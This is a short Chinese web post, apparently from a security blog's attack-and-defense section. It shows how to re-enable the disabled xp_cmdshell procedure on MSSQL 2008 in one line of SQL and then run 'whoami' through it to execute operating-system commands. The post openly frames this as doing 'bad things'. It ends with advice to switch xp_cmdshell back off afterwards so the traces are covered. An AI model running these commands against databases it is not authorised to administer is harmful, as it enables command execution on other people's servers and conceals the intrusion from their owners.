首页 > 网络安全 > 脚本攻防

MSSQL2008一句话启用xp_cmdshell

admin 脚本攻防 2022-02-17 09:23:47 xp_cmdshell"

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

 

 

幸运的是:只要该扩展存储过程没被删除,我们就可以一句话启用它(不支持多句执行的话,请单独执行每句):

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

 

好了,来试试!

exec master..xp_cmdshell "whoami"


 

PS:干完坏事要擦PP哦!将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/jbgongfang/148953.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持